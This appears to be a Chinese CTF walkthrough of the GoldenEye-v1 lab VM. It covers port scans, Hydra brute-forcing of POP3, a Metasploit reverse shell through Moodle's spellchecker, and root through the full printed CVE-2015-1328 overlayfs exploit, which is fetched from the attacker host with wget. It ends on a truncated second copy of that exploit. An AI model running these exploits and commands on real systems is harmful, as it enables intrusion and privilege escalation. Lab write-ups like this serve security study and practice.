1-GoldenEye-v1

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:26:ba:69, IPv4: 192.168.3.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.3.1     00:50:56:c0:00:08       VMware, Inc.
192.168.3.2     00:50:56:e4:e9:e5       VMware, Inc.
192.168.3.13    00:0c:29:4a:22:25       VMware, Inc.
192.168.3.254   00:50:56:e4:7d:ff       VMware, Inc.
192.168.3.1     00:50:56:c0:00:08       VMware, Inc. (DUP: 2)

7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.014 seconds (127.11 hosts/sec). 4 responded
                                                                                                                                    
                                                                                                                                    
┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.3.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 06:56 EDT
Nmap scan report for 192.168.3.13
Host is up (0.00032s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
25/tcp    open  smtp     Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) AUTH-RESP-CODE USER CAPA PIPELINING TOP UIDL RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
55007/tcp open  pop3     Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_pop3-capabilities: AUTH-RESP-CODE STLS UIDL USER CAPA SASL(PLAIN) RESP-CODES TOP PIPELINING
MAC Address: 00:0C:29:4A:22:25 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.3.13

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.60 seconds

访问对应目录

于是寻找可疑用户名密码

源码terminal.js

var data = [
  {
    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
  }
];

//
//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//

var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
  var currentElementId = allElements[j].id;
  var currentElementIdContent = data[0][currentElementId];
  var element = document.getElementById(currentElementId);
  var devTypeText = currentElementIdContent;

 
  var i = 0, isTag, text;
  (function type() {
    text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + `<span class='blinker'>&#32;</span>`;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    if (isTag) return type();
    setTimeout(type, 60);
  })();
}

username

1 2	Boris Natalya

password

1	InvincibleHack3r

得到密码

1	InvincibleHack3r

成功登录

GoldenEye is a Top Secret Soviet oribtal weapons project.  Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)

Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system

Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port

POP3服务器的默认端口是110，结合前面的nmap全端口扫描发现此处为55006，55007

┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.3.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 06:56 EDT
Nmap scan report for 192.168.3.13
Host is up (0.00032s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
25/tcp    open  smtp     Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) AUTH-RESP-CODE USER CAPA PIPELINING TOP UIDL RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
55007/tcp open  pop3     Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_pop3-capabilities: AUTH-RESP-CODE STLS UIDL USER CAPA SASL(PLAIN) RESP-CODES TOP PIPELINING
MAC Address: 00:0C:29:4A:22:25 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

使用海德拉爆破

1	hydra -L user.txt -P /root/yiyi/wordlists-master/fasttrack.txt -s -t 32 55007 -V 192.168.3.13 pop3 -I

得到

1 2	[55007][pop3] host: 192.168.4.202 login: natalya password: bird [55007][pop3] host: 192.168.4.202 login: boris password: secret1!

nc连接登录boris后查看邮件

┌──(root㉿kali)-[~/yiyi/tmp]
└─# nc 192.168.3.13 55007 
+OK GoldenEye POP3 Electronic-Mail System
user boris
+OK
pass secret1!
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921
.
retr 1  
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
retr 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
retr 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id 4B9F4454B1
        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

.

有一份文件用了GoldenEye的访问代码作为附件进行发送，存在根目录

查看natalya

┌──(root㉿kali)-[~/yiyi/tmp]
└─# nc 192.168.3.13 55007
+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.

一个密码本

1 2	username: xenia password: RCP90rulez!

以及域名绑定信息

1	Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

修改hosts后重新访问severnaya-station.com/gnocertdir

whatweb扫描指纹

whatweb 是一个命令行工具，用于识别和分析网站的技术信息。它能够探测网站的服务器、操作系统、Web 应用程序、内容管理系统（如 WordPress、Joomla）、框架、库、版本号、安全性信息等。

┌──(root㉿kali)-[~]
└─# whatweb severnaya-station.com/gnocertdir
http://severnaya-station.com/gnocertdir [301 Moved Permanently]
  - Server: Apache/2.4.7 (Ubuntu)
  - Country: RESERVED [ZZ]
  - HTTP Server: Ubuntu Linux, Apache/2.4.7
  - IP: 192.168.3.13
  - Redirect: http://severnaya-station.com/gnocertdir/
  - Title: 301 Moved Permanently

http://severnaya-station.com/gnocertdir/ [200 OK]
  - Server: Apache/2.4.7 (Ubuntu)
  - Content-Language: en
  - Cookies: MoodleSession
  - Country: RESERVED [ZZ]
  - HTTP Server: Ubuntu Linux, Apache/2.4.7
  - IP: 192.168.3.13
  - CMS: Moodle
  - PHP Version: 5.5.9-1ubuntu4.24
  - Scripts: footer, head, text/css, text/javascript
  - Title: GoldenEye Operators Training - Moodle
  - Uncommon Headers: content-script-type, content-style-type
  - X-Frame-Options: sameorigin
  - X-Powered-By: PHP/5.5.9-1ubuntu4.24

乱点一通发现需要登录

使用对应的密码登录

messages底下有个邮件

Tuesday, 24 April 2018
09:24 PM: Greetings Xenia,

As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.

My email username is...

doak

Thank you,

Cheers,

Dr. Doak "The Doctor"
Training Scientist - Sr Level Training Operating Supervisor
GoldenEye Operations Center Sector
Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@
Please Recycle before you print, Stay Green aka save the company money!
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.

新用户继续爆破

1 2	┌──(root㉿kali)-[~] └─# hydra -l doak -P /usr/share/dict/cracklib-small -s 55007 192.168.3.13 pop3 -V -t 64

得到密码

4England!

切换用户登录cms，发现secret

下载

007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

007,
我能够通过clear text捕获此应用程序adm 1 n cr 3ds。
GoldenEye服务器内的大多数Web应用程序中的文本都会被扫描，因此我无法在此处添加cr 3收件箱。
这里有一些有趣的东西：/dir007key/for-007.jpg
另外，正如您可能知道的那样，HCP-90远远优于任何其他武器，而《杀戮许可证》是唯一的游戏方式。

发现Something juicy is located here: /dir007key/for-007.jpg

访问

1	http://severnaya-station.com/dir007key/for-007.jpg

得到key

1	xWinter1995x!

以此密码登录admin

web端通了，于是想办法打进去

属于Moodle 2.2.3

搜索相关漏洞执行后发现没能成功，搜索发现需要修改执行PSpellShell
https://www.exploit-db.com/exploits/29324
‘s_editor_tinymce_spellengine’ => ‘PSpellShell’,

┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit tip: You can use help to view all available commands
                                                  
                                              `:oDFo:`                            
                                           ./ymM0dayMmy/.                          
                                        -+dHJ5aGFyZGVyIQ==+-                    
                                    `:sm⏣~~Destroy.No.Data~~s:`                
                                 -+h2~~Maintain.No.Persistence~~h+-              
                             `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`          
                          ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.      
                       -++SecKCoin++e.AMd`       `.-://///+hbove.913.ElsMNh+-    
                      -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-  
                      :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:  
                      :we're.all.alike'`                     The.PFYroy.No.D7:  
                      :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:    
                      :msf>exploit -j.                       :Ns.BOB&ALICEes7:    
                      :---srwxrwx:-.`                        `MS146.52.No.Per:    
                      :<script>.Ac816/                        sENbove3101.404:    
                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:    
                      :09.14.2011.raid                       /STFU|wall.No.Pr:    
                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:    
                      :#OUTHOUSE-  -s:                       /corykennedyData:    
                      :$nmap -oS                              SSo.6178306Ence:    
                      :Awsm.da:                            /shMTl#beats3o.No.:    
                      :Ring0:                             `dDestRoyREXKC3ta/M:    
                      :23d:                               sSETEC.ASTRONOMYist:    
                       /-                        /yo-    .ence.N:(){ :|: & };:    
                                                 `:Shall.We.Play.A.Game?tron/    
                                                 ```-ooy.if1ghtf0r+ehUser5`    
                                               ..th3.H1V3.U2VjRFNN.jMh+.`          
                                              `MjM~~WE.ARE.se~~MMjMs              
                                               +~KANSAS.CITY's~-`                  
                                                J~HAKCERS~./.`                    
                                                .esc:wq!:`                        
                                                 +++ATH`                            
                                                  `


       =[ metasploit v6.4.29-dev                          ]
+ -- --=[ 2458 exploits - 1261 auxiliary - 430 post       ]
+ -- --=[ 1471 payloads - 49 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

search Moodle
msf6 > search Moodle

Matching Modules
================

   #  Name                                                          Disclosure Date  Rank       Check  Description
   -  ----                                                          ---------------  ----       -----  -----------
   0  exploit/multi/http/moodle_admin_shell_upload                  2019-04-28       excellent  Yes    Moodle Admin Shell Upload
   1  exploit/multi/http/moodle_spelling_binary_rce                 2013-10-30       excellent  Yes    Moodle Authenticated Spelling Binary RCE
   2  exploit/multi/http/moodle_spelling_path_rce                   2021-06-22       excellent  Yes    Moodle SpellChecker Path Authenticated Remote Command Execution
   3  exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce  2020-07-20       good       Yes    Moodle Teacher Enrollment Privilege Escalation to RCE


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce

msf6 > use 1
msf6 exploit(multi/http/moodle_spelling_binary_rce) > info

       Name: Moodle Authenticated Spelling Binary RCE
     Module: exploit/multi/http/moodle_spelling_binary_rce
   Platform: Unix, Linux
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2013-10-30

Provided by:
  Brandon Perry <bperry.volatile@gmail.com>

Module side effects:
 config-changes
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Automatic

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       Password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploi
                                        t.html
  RPORT      80               yes       The target port (TCP)
  SESSKEY                     no        The session key of the user to impersonate
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /moodle/         yes       The URI of the Moodle installation
  USERNAME   admin            yes       Username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  Moodle allows an authenticated user to define spellcheck settings via the web interface.
  The user can update the spellcheck mechanism to point to a system-installed aspell binary.
  By updating the path for the spellchecker to an arbitrary command, an attacker can run
  arbitrary commands in the context of the web application upon spellchecking requests.

  This module also allows an attacker to leverage another privilege escalation vuln.
  Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey
  and use this to escalate privileges to that of an admin, allowing the module to pop a shell
  as a previously unprivileged authenticated user.

  This module was tested against Moodle version 2.5.2 and 2.2.3.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2013-3630
  https://nvd.nist.gov/vuln/detail/CVE-2013-4341
  https://www.exploit-db.com/exploits/28174
  https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats


View the full module info with the info -d command.

msf6 exploit(multi/http/moodle_spelling_binary_rce) > set username admin 
username => admin
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set password xWinter1995x! 
password => xWinter1995x!
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set rhost severnaya-station.com
rhost => severnaya-station.com
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set targeturi /gnocertdir
targeturi => /gnocertdir
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set payload cmd/unix/reverse 
payload => cmd/unix/reverse
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set lhost 192.168.3.11
lhost => 192.168.3.11
msf6 exploit(multi/http/moodle_spelling_binary_rce) > exploit

[*] Started reverse TCP double handler on 192.168.3.11:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4XKzS89jZGiRslot;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "4XKzS89jZGiRslot\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.3.11:4444 -> 192.168.3.13:41072) at 2024-10-16 06:41:37 -0400

python3 -c 'import pty;pty.spawn("/bin/bash")'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ find / -perm -u=s -type f 2>/dev/null
<.9/plugins/spellchecker$ find / -perm -u=s -type f 2>/dev/null              
/bin/umount
/bin/ping6
/bin/ping
/bin/su
/bin/mount
/bin/fusermount
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/sbin/pppd
/usr/sbin/uuidd

相关信息

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ find / -perm -u=s -type f 2>/dev/null
<.9/plugins/spellchecker$ find / -perm -u=s -type f 2>/dev/null              
/bin/umount
/bin/ping6
/bin/ping
/bin/su
/bin/mount
/bin/fusermount
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/sbin/pppd
/usr/sbin/uuidd
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.1 LTS
Release:        14.04
Codename:       trusty

搜索得到对应cve

1	https://www.exploit-db.com/exploits/37292

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

编译出错最后调教g老师出了最终版

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ wget http://192.168.3.11:8083/37292.c
<.9/plugins/spellchecker$ wget http://192.168.3.11:8083/37292.c              
--2024-10-16 05:33:46--  http://192.168.3.11:8083/37292.c
Connecting to 192.168.3.11:8083... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4083 (4.0K) [text/x-csrc]
Saving to: '37292.c'

100%[======================================>] 4,083       --.-K/s   in 0s      

2024-10-16 05:33:46 (634 MB/s) - '37292.c' saved [4083/4083]

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls
ls
37292.c        config.php        editor_plugin_src.js  includes
changelog.txt  css               exp                   rpc.php
classes        editor_plugin.js  img
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc -D_GNU_SOURCE -o exp 37292.c
<.9/plugins/spellchecker$ cc -D_GNU_SOURCE -o exp 37292.c                    
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls
ls
37292.c        config.php        editor_plugin_src.js  includes
changelog.txt  css               exp                   rpc.php
classes        editor_plugin.js  img
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ chmod 777 exp 
chmod 777 exp 
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ./exp
./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root

exp如下

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mount.h>
#include <fcntl.h>
#include <string.h>
#include <signal.h>
#include <dlfcn.h>

